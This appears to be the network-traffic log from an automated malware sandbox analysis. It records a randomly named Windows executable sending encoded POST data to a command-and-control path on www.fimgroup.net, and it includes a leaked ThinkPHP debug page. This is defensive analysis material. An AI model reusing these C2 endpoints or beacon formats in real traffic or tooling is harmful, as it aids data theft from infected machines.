                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Sep 16, 2024 09:40:55.801822901 CEST1236INHTTP/1.1 404 Not Found
                                                  Date: Mon, 16 Sep 2024 07:52:16 GMT
                                                  Server: Apache
                                                  Upgrade: h2
                                                  Connection: Upgrade, close
                                                  Vary: Accept-Encoding
                                                  Transfer-Encoding: chunked
                                                  Content-Type: text/html; charset=utf-8
                                                  Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e5 8f 91 e7 94 9f e9 94 99 e8 af af 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 36 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d [TRUNCATED]
                                                  Data Ascii: 2000<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title></title> <meta name="robots" content="noindex,nofollow" /> <style> /* Base */ body { color: #333; font: 16px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3{ margin: 12px; font-size: 16px; font-weight: bold; } abbr{ cursor: help; text-decoration: underline; text-decoration-style: dotted; } a{ color [TRUNCATED]
                                                  Sep 16, 2024 09:40:55.801841021 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a
                                                  Data Ascii: cursor: pointer; } a:hover{ text-decoration: underline; } .line-error{ background: #f8cbcb; } .echo table { width: 100%; } .echo pr
                                                  Sep 16, 2024 09:40:55.801850080 CEST1236INData Raw: 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 39 39 39 3b 0a
                                                  Data Ascii: padding: 16px; border-radius: 4px; background: #999; } .exception .source-code{ padding: 6px; border: 1px solid #ddd; background: #f9f9f9; overflow-x
                                                  Sep 16, 2024 09:40:55.801861048 CEST1236INData Raw: 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61
                                                  Data Ascii: line-height: 16px; font-size:14px; font-family: Consolas,"Liberation Mono",Courier,Verdana,""; } .exception .trace ol{ margin: 12px; } .exception .trace ol li{
                                                  Sep 16, 2024 09:40:55.801872015 CEST1236INData Raw: 67 6e 3a 20 74 6f 70 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 61 6c 6c 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 78 63 65 70 74 69 6f 6e 2d 76 61 72 20 74 61 62 6c 65
                                                  Data Ascii: gn: top; word-break: break-all; } .exception-var table td:first-child{ width: 28%; font-weight: bold; white-space: nowrap; } .exception-var table td pre{
                                                  Sep 16, 2024 09:40:55.801882029 CEST1236INData Raw: 2f 2a 20 61 20 6d 61 72 6b 75 70 20 61 74 74 72 69 62 75 74 65 20 76 61 6c 75 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 70 72 65 2e 70 72 65 74 74 79 70 72 69 6e 74 20 2e 64 65 63 2c 20 70 72 65 2e 70 72 65 74 74 79 70 72 69 6e 74 20 2e 76 61 72 20
                                                  Data Ascii: /* a markup attribute value */ pre.prettyprint .dec, pre.prettyprint .var { color: #606 } /* a declaration; a variable name */ pre.prettyprint .fun { color: red } /* a function name */ </style></head><body> <div cla
                                                  Sep 16, 2024 09:40:55.801919937 CEST1236INData Raw: a8 a1 e5 9d 97 0a 3c 2f 63 6f 64 65 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 6e 65 2d 35 39 22 3e 3c 63 6f 64 65 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 74 68 69 73 2d 26 67 74 3b 72 65 71 75 65 73 74 2d 26 67 74 3b
                                                  Data Ascii: </code></li><li class="line-59"><code> $this-&gt;request-&gt;setModule($module);</code></li><li class="line-60"><code> $this-&gt;app-&gt;init($module);</code></li><li class="line-61"><code> } el
                                                  Sep 16, 2024 09:40:55.801930904 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 69 6e 20 3c 61 20 63 6c 61 73 73 3d 22 74 6f 67 67 6c 65 22 20 74 69 74 6c 65 3d 22 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 6a 69 61 6e 63 68 65 2e 7a 68 6f 6e 67 7a 68 75 61 6e 6b 6b 31 34 34 2e 73
                                                  Data Ascii: <li>in <a class="toggle" title="/www/wwwroot/jianche.zhongzhuankk144.sbs/thinkphp/library/think/route/dispatch/Module.php line 62">Module.php line 62</a></li> <li> at <abbr title="thi
                                                  Sep 16, 2024 09:40:55.801940918 CEST1236INData Raw: 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 3e 70 72 75 74 66 52 5f 50 3c 2f 74 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                  Data Ascii: tr> <td>prutfR_P</td> <td> xUzASW4UVirhqEepkKH7G1hhCXRgKJ LG3aq8idvTSxDBC AgnYLMr8gyh0BIXno1CEegJvcgs9HgFk4HlC4XGXQkMAamkZroN1kMIfewJ5xcpTkuE3fYdnwX QQCm9qWw==
                                                  Sep 16, 2024 09:40:55.801949978 CEST556INData Raw: 77 77 77 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                  Data Ascii: www </td> </tr> <tr> <td>HOME</td> <td> /home/www </td> </tr>
                                                  Sep 16, 2024 09:40:55.808562040 CEST1236INData Raw: 78 55 7a 41 53 57 34 55 56 69 72 68 71 45 65 70 6b 4b 48 37 47 31 68 68 43 58 52 67 4b 4a 2b 4c 47 33 61 71 38 69 64 76 54 53 78 44 42 43 2b 41 67 6e 59 4c 4d 72 38 67 79 68 30 42 49 58 6e 6f 31 43 45 65 67 4a 76 63 67 73 39 48 67 46 6b 34 48 6c
                                                  Data Ascii: xUzASW4UVirhqEepkKH7G1hhCXRgKJ+LG3aq8idvTSxDBC+AgnYLMr8gyh0BIXno1CEegJvcgs9HgFk4HlC4XGXQkMAamkZroN1kMIfewJ5xcpTkuE3fYdnwX+QQCm9qWw==&amp;u8b=M0MH_xux6 </td> </tr> <tr>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  33192.168.2.54974562.149.128.40802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:41:01.486906052 CEST782OUTPOST /f3w9/ HTTP/1.1
                                                  Host: www.fimgroup.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 209
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.fimgroup.net
                                                  Referer: http://www.fimgroup.net/f3w9/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 4f 6a 51 6d 68 4c 44 74 77 72 42 61 2b 62 4b 4c 66 35 57 63 6b 46 64 44 4a 71 61 36 4f 2b 51 58 77 65 76 74 64 6f 72 77 66 2b 68 66 6c 78 76 5a 74 47 6a 44 6c 37 70 41 79 46 49 72 68 63 47 6d 2f 53 6b 6f 43 4e 70 32 50 65 4f 35 62 53 50 42 49 37 4f 57 6a 36 52 32 58 77 62 6f 42 47 34 5a 2b 33 4d 56 4c 71 4e 63 4c 57 72 73 34 4f 66 42 75 57 2f 51 6e 4f 56 6d 74 46 30 47 50 71 61 45 39 31 45 4d 36 6c 62 44 39 2f 67 39 32 6a 45 4a 75 6b 53 68 53 4d 73 37 73 72 34 41 2b 52 57 78 4b 6c 2f 44 6e 44 54 78 6d 61 74 30 50 32 68 45 6b 64 73 6d 69 57 44 6c 53 61 7a 46 39 2b 54 5a 50 47 54 7a 32 2b 49 3d
                                                  Data Ascii: prutfR_P=OjQmhLDtwrBa+bKLf5WckFdDJqa6O+QXwevtdorwf+hflxvZtGjDl7pAyFIrhcGm/SkoCNp2PeO5bSPBI7OWj6R2XwboBG4Z+3MVLqNcLWrs4OfBuW/QnOVmtF0GPqaE91EM6lbD9/g92jEJukShSMs7sr4A+RWxKl/DnDTxmat0P2hEkdsmiWDlSazF9+TZPGTz2+I=
                                                  Sep 16, 2024 09:41:02.161469936 CEST1236INHTTP/1.1 404 Not Found
                                                  Cache-Control: private
                                                  Content-Type: text/html; charset=utf-8
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  Date: Mon, 16 Sep 2024 07:41:01 GMT
                                                  Connection: close
                                                  Content-Length: 4948
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                                  Sep 16, 2024 09:41:02.161495924 CEST1236INData Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e
                                                  Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
                                                  Sep 16, 2024 09:41:02.161513090 CEST1236INData Raw: 3a 69 74 61 6c 69 63 3b 7d 20 0a 2e 63 6c 65 61 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 20 0a 2e 70 72 65 66 65 72 72 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 20 32 70 78 20 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61
                                                  Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
                                                  Sep 16, 2024 09:41:02.161528111 CEST672INData Raw: 6d 61 74 69 6f 6e 3a 3c 2f 68 34 3e 20 0a 20 20 3c 64 69 76 20 69 64 3d 22 64 65 74 61 69 6c 73 2d 6c 65 66 74 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c
                                                  Data Ascii: mation:</h4> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>&nbsp;&nbsp;&nbsp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandl
                                                  Sep 16, 2024 09:41:02.161544085 CEST787INData Raw: 70 3b 26 6e 62 73 70 3b 44 3a 5c 69 6e 65 74 70 75 62 5c 77 77 77 72 6f 6f 74 5c 66 33 77 39 5c 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 20 63 6c 61 73 73 3d 22 61 6c 74 22 3e 3c 74 68 3e 4c 6f 67 6f 6e 20 4d 65 74 68 6f 64 3c 2f
                                                  Data Ascii: p;&nbsp;D:\inetpub\wwwroot\f3w9\</td></tr> <tr class="alt"><th>Logon Method</th><td>&nbsp;&nbsp;&nbsp;Anonymous</td></tr> <tr><th>Logon User</th><td>&nbsp;&nbsp;&nbsp;Anonymous</td></tr> <tr class="alt"><th>Request Tracing Direc


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  34192.168.2.54974662.149.128.40802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:41:04.036267042 CEST802OUTPOST /f3w9/ HTTP/1.1
                                                  Host: www.fimgroup.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 229
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.fimgroup.net
                                                  Referer: http://www.fimgroup.net/f3w9/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 4f 6a 51 6d 68 4c 44 74 77 72 42 61 2b 34 69 4c 5a 76 65 63 76 46 64 45 51 71 61 36 41 65 51 70 77 65 6a 74 64 70 2b 37 66 49 35 66 67 6a 33 5a 73 45 4c 44 6b 37 70 41 36 6c 49 55 2f 73 47 39 2f 53 5a 56 43 49 52 32 50 59 69 35 62 58 7a 42 49 49 6d 52 67 4b 52 30 43 67 62 71 63 32 34 5a 2b 33 4d 56 4c 72 70 6d 4c 57 44 73 34 2f 76 42 76 30 48 54 38 75 56 6c 71 46 30 47 4c 71 61 66 39 31 46 72 36 67 37 74 39 36 6b 39 32 69 30 4a 70 31 53 67 59 4d 73 68 6a 4c 35 49 39 54 66 48 53 46 58 4d 72 56 65 44 78 4b 70 64 4b 41 4d 75 2b 2f 6b 4f 78 32 76 64 43 4a 37 79 73 4f 79 77 56 6c 44 44 6f 70 64 4a 54 71 6f 2b 6c 66 44 44 44 50 36 4e 47 4b 33 32 6f 46 67 54
                                                  Data Ascii: prutfR_P=OjQmhLDtwrBa+4iLZvecvFdEQqa6AeQpwejtdp+7fI5fgj3ZsELDk7pA6lIU/sG9/SZVCIR2PYi5bXzBIImRgKR0Cgbqc24Z+3MVLrpmLWDs4/vBv0HT8uVlqF0GLqaf91Fr6g7t96k92i0Jp1SgYMshjL5I9TfHSFXMrVeDxKpdKAMu+/kOx2vdCJ7ysOywVlDDopdJTqo+lfDDDP6NGK32oFgT
                                                  Sep 16, 2024 09:41:04.709839106 CEST1236INHTTP/1.1 404 Not Found
                                                  Cache-Control: private
                                                  Content-Type: text/html; charset=utf-8
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  Date: Mon, 16 Sep 2024 07:41:04 GMT
                                                  Connection: close
                                                  Content-Length: 4948
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                                  Sep 16, 2024 09:41:04.709862947 CEST224INData Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e
                                                  Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;
                                                  Sep 16, 2024 09:41:04.709878922 CEST1236INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 43 38 37 42 32 3b 20 0a 7d 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79
                                                  Data Ascii: background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} .content-container p{margin:0 0 10px 0; }#details-left{
                                                  Sep 16, 2024 09:41:04.709893942 CEST1236INData Raw: 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 20 0a 20 20 3c 68 34 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 68 61 73 20 62 65 65
                                                  Data Ascii: >HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.</h4> </div> <div class="content-container"> <fieldset><h4>Most likely causes:</h4> <ul> <
                                                  Sep 16, 2024 09:41:04.709908962 CEST1235INData Raw: 62 73 70 3b 4d 61 70 52 65 71 75 65 73 74 48 61 6e 64 6c 65 72 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 20 63 6c 61 73 73 3d 22 61 6c 74 22 3e 3c 74 68 3e 48 61 6e 64 6c 65 72 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62
                                                  Data Ascii: bsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td></tr> </table> </div> <div id="details-right">


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  35192.168.2.54974762.149.128.40802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:41:06.579729080 CEST1819OUTPOST /f3w9/ HTTP/1.1
                                                  Host: www.fimgroup.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.fimgroup.net
                                                  Referer: http://www.fimgroup.net/f3w9/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 4f 6a 51 6d 68 4c 44 74 77 72 42 61 2b 34 69 4c 5a 76 65 63 76 46 64 45 51 71 61 36 41 65 51 70 77 65 6a 74 64 70 2b 37 66 49 78 66 38 41 2f 5a 74 6a 2f 44 69 4c 70 41 77 46 49 56 2f 73 48 6e 2f 57 31 52 43 49 56 41 50 62 57 35 55 53 2f 42 5a 70 6d 52 33 61 52 30 61 51 62 70 42 47 34 70 2b 33 63 4a 4c 72 35 6d 4c 57 44 73 34 38 33 42 72 6d 2f 54 37 65 56 6d 74 46 30 38 50 71 62 77 39 31 4d 55 36 67 50 54 39 75 51 39 32 42 63 4a 73 48 4b 67 46 38 73 6e 33 72 34 4f 39 54 44 55 53 44 7a 32 72 56 43 70 78 49 35 64 4a 78 78 77 74 39 30 32 6c 41 6a 4f 45 5a 47 65 74 65 79 52 63 54 62 48 69 36 78 63 58 37 55 74 6f 70 50 6a 47 4d 43 49 64 4f 48 52 75 79 68 4a 31 67 4e 6a 46 61 6c 63 49 2f 48 43 42 66 31 44 31 31 73 50 37 73 6d 44 31 51 46 71 33 79 4c 53 39 38 6a 44 49 36 4e 6a 74 61 69 6c 72 62 76 39 69 78 4c 55 71 2f 70 48 51 54 68 4e 78 58 58 45 71 48 7a 30 75 6c 72 68 7a 44 35 33 70 56 62 39 2b 54 38 7a 78 7a 6b 4f 55 44 5a 74 36 72 45 67 54 48 68 2b 57 4a 68 57 79 68 4c 46 56 [TRUNCATED]
